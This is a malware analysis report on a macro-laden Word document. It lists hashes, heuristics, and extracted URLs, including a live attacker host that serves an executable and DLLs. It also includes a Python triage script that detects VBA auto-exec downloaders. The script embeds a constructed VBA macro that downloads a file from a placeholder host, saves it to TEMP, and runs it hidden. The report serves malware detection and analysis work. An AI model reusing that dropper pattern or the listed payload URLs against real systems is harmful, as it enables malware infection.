Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 c75a9108d565dda4…

MALICIOUS

Office (OLE) / .DOC

Size: 2.57 MB
Created: 2022-04-23 07:21:00
Authoring application: Microsoft Office Word
First seen: 2022-05-05
MD5: e641c2fb4b71b12e4f7abae53d89a5a8
SHA-1: 2d531426181c0ec14d2d1f8250ffc85eb4916fec
SHA-256: c75a9108d565dda4d08d4673f221c53cce07b50680e62df43f30a1aa56a9957b
Risk score: 238

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic (VBA macro)
T1059.003 Command and Scripting Interpreter: Windows Command Shell

This document carries VBA macros with a Document_Open entry point, so the code runs as soon as the document is opened and macros are enabled (OLE_VBA_DOCOPEN). OLE_VBA_PCODE_AUTOEXEC_EXEC finds the same auto-exec token in the compiled p-code stream, so the behaviour does not depend on the source stream being intact or on source extraction succeeding. The macro calls CreateObject to instantiate MSXML2.XMLHTTP (an HTTP client) and Wscript.Shell (command execution) and reads environment variables through Environ(), which is the pattern of a downloader/dropper: fetch a payload, write it to a path derived from the environment, then execute it. Not every extracted URL is a download target. The phonecallvoicemail.com set, an executable (crashreporter.exe) alongside Mozilla runtime DLLs (nss3.dll, mozglue.dll) and Visual C++ runtime DLLs (vcruntime140.dll, msvcp140.dll), is the group to treat as attacker infrastructure and to block or hunt for. The AdSense, nvu.com and similar links are consistent with the body text of a repurposed web-advertising guide used as the lure, and the ns.adobe.com and w3.org entries are XMP/RDF namespace URIs from embedded metadata rather than network contacts. The per-URL channel labels that would confirm this split are not reproduced in this listing, so treat that reading as an analyst assessment rather than a verified finding.

Heuristics (9)

  • Reference to Windows Script Host (high) SC_STR_WSCRIPT
  • Document_Open macro (high) OLE_VBA_DOCOPEN
  • CreateObject call (high) OLE_VBA_CREATEOBJ
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact (high) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA macros detected (medium) OLE_VBA_MACROS
    Document contains VBA macro code.
  • Environ() call (env variable access) (low) OLE_VBA_ENVIRON
  • Urgency / deadline lure (low) SE_URGENCY_LURE
    Document contains urgency or deadline language ('account will be terminated', 'action required within 24 hours', etc.); useful context, but low-signal without other findings.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://phonecallvoicemail.com/storm.png
    • https://phonecallvoicemail.com/time.ini
    • https://phonecallvoicemail.com/time.ini.bak
    • https://phonecallvoicemail.com/time.wav
    • https://phonecallvoicemail.com/vcruntime140.dll
    • https://phonecallvoicemail.com/crashreporter.exe
    • https://phonecallvoicemail.com/mozglue.dll
    • https://phonecallvoicemail.com/msvcp140.dll
    • https://phonecallvoicemail.com/nss3.dll
    • http://www.adsense-tools.com/
    • http://www.AdSense-tools.com
    • http://www.adsense-secrets.com/globat.html
    • http://www.nvu.com/
    • http://www.nvu.com
    • http://www.submitexpress.com/
    • http://www.free-web-money.com/000449.html
    • http://www.askthebuilder.com/457_Tar_and_Chip_Driveway_Update.shtml
    • http://www.askthebuilder.com/457_Tar_and_Chip_Driveway_Update.shtm
    • http://www.joelcomm.com/
    • http://www.joelcomm.com
    • http://www.dressesforthewedding.com/
    • http://www.lockergnome.com/
    • http://www.lockergnome.com
    • http://www.overture.com/
    • http://www.googlest.com/
    • http://keywords.clickhereforit.com/
    • http://www.worldvillage.com/336x280-1.html
    • http://www.worldvillage.com/336x280-1.htm
    • http://a.websponsors.com/c/s%3D15129/c%3D22828/j%3D0/l%3D%5Bslot_id%5D/i%3D1/
    • http://www.allfeeds.com/
    • https://www.google.com/support/adsense
    • https://www.google.com/adsense/glossary
    • http://www.google.com/services/adsense_tour/
    • https://google.com/adsense/localized-terms
    • http://service.bfast.com/bfast/click?bfmid=115761&siteid=9860223&categoryid=domain_reg_4
    • http://www.elance.com/
    • http://www.elance.com
    • http://www.guru.com/
    • http://www.guru.com
    • https://www.google.com/adsense/localized-terms
    • https://www.google.com/adsense/policies
    • https://www.google.com/AdSense/policies
    • https://www.google.com/adsense/adformats
    • https://www.Google.com/AdSense/adformats
    • https://www.google.com/support/adsense/bin/static.py?page=tips.html
    • https://www.google.com/support/AdSense/bin/static.py?page=tips.htm
    • http://www.intuitive.com/
    • http://www.intuitive.com
    • http://ns.adobe.com/xap/1.0/
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    (6 more URLs not shown)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256: 280e338f176721aea086dafcfed74b7607d1b84b0e6704b45c3f7a1219627a9e
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11145 bytes
Detection: ClamAV: No threats found
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
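The verdict on the carved macro source above ("auto-exec entry point and execution/download terms") and the summary's Document_Open / CreateObject / Environ() findings come down to a handful of source-level checks. The script below is an added example of that triage logic, written for this page; it is not the analysis engine's code and not the report's macros.bas. The VBA sample inside it is constructed to match the shape the report describes (the URL is a reserved .invalid hostname, not one of the extracted URLs), and the ProgID and execution-token lists are assumptions about what a typical downloader uses.

```python
"""Source-level triage of a carved VBA macro: auto-exec entry points,
CreateObject targets, execution/download tokens, Environ() use and URLs.

Added example, not the analysis engine's own code. The macro below is
constructed for illustration (the URL is a reserved .invalid name); it is
not the carved macros.bas from the report. The ProgID and token lists are
assumptions about what a typical downloader uses.
"""
import re

# Procedures Office runs without a click once macros are enabled (lower-case).
AUTOEXEC = {
    "document_open", "autoopen", "auto_open", "document_new", "autonew",
    "document_close", "autoclose", "workbook_open", "workbook_activate",
    "autoexec",
}

# COM ProgIDs a downloader/dropper typically instantiates, with the
# capability each one gives the macro (assumed list, not from the report).
SUSPICIOUS_PROGIDS = {
    "msxml2.xmlhttp": "http-download",
    "msxml2.serverxmlhttp": "http-download",
    "winhttp.winhttprequest.5.1": "http-download",
    "wscript.shell": "shell-exec",
    "shell.application": "shell-exec",
    "adodb.stream": "file-write",
    "scripting.filesystemobject": "file-write",
}

# Keywords that execute something when they appear in code (not in strings).
EXEC_TOKENS = ("Shell", "ShellExecute", "Run", "Exec", "CallByName", "Navigate")

PROC_RE = re.compile(
    r"^\s*(?:Private\s+|Public\s+|Friend\s+)?(?:Static\s+)?(?:Sub|Function)\s+(\w+)",
    re.I | re.M)
CREATEOBJ_RE = re.compile(r"\b(?:CreateObject|GetObject)\s*\(\s*\"([^\"]+)\"", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
STRING_RE = re.compile(r"\"(?:[^\"]|\"\")*\"")   # VBA doubles quotes to escape them
COMMENT_RE = re.compile(r"'[^\n]*")


def strip_literals(src: str) -> str:
    """Blank out string literals and comments so keyword scans only see code.
    This keeps the literal "Wscript.Shell" from counting as a Shell() call."""
    return COMMENT_RE.sub("", STRING_RE.sub('""', src))


def triage_vba(src: str) -> dict:
    code = strip_literals(src)
    procs = PROC_RE.findall(code)
    autoexec = [p for p in procs if p.lower() in AUTOEXEC]
    objects = {pid: SUSPICIOUS_PROGIDS.get(pid.lower(), "unknown")
               for pid in CREATEOBJ_RE.findall(src)}
    exec_tokens = sorted(t for t in EXEC_TOKENS
                         if re.search(r"\b%s\b" % t, code, re.I))
    environ = re.search(r"\bEnviron\s*\(", code, re.I) is not None
    urls = sorted(set(URL_RE.findall(src)))      # URLs live in strings, scan raw source

    caps = set(objects.values())
    downloads = "http-download" in caps
    executes = "shell-exec" in caps or bool(exec_tokens)
    if autoexec and (downloads or executes):
        verdict = "AUTOEXEC_EXEC"      # the combination the report's high-severity rule fires on
    elif autoexec:
        verdict = "AUTOEXEC_ONLY"      # runs on open, but nothing obviously harmful
    elif downloads or executes:
        verdict = "EXEC_NO_AUTOEXEC"   # needs a button/form trigger to run
    else:
        verdict = "NO_FINDINGS"
    return {"autoexec": autoexec, "objects": objects, "exec_tokens": exec_tokens,
            "environ": environ, "urls": urls, "verdict": verdict}


# Constructed sample: the shape the report describes, with a placeholder URL.
SAMPLE_VBA = r'''
Private Sub Document_Open()
    ' Fetch a payload, stage it under %TEMP%, run it hidden.
    Dim h As Object, f As Object, s As Object
    Set h = CreateObject("MSXML2.XMLHTTP")
    h.Open "GET", "http://example.invalid/loader.dat", False
    h.Send
    Set f = CreateObject("ADODB.Stream")
    f.Open: f.Type = 1: f.Write h.responseBody
    f.SaveToFile Environ("TEMP") & "\loader.exe", 2
    Set s = CreateObject("Wscript.Shell")
    s.Run Environ("TEMP") & "\loader.exe", 0
End Sub
'''

if __name__ == "__main__":
    for k, v in triage_vba(SAMPLE_VBA).items():
        print(f"{k:12} {v}")
```

Feed it the source olevba decodes (the same extractor the report used) and the verdict lines up with the report's heuristics: Document_Open gives OLE_VBA_DOCOPEN, the ProgIDs give OLE_VBA_CREATEOBJ and SC_STR_WSCRIPT, Environ() gives OLE_VBA_ENVIRON, and the combination is the high-severity auto-exec-plus-execution finding. Note the caveat the report itself raises: this scans decoded source only. For a p-code-only document, or one whose source stream has been tampered with so extraction fails, the same tokens have to be recovered from the compiled VBA stream (pcodedmp is the usual tool), which is the gap OLE_VBA_PCODE_AUTOEXEC_EXEC exists to cover.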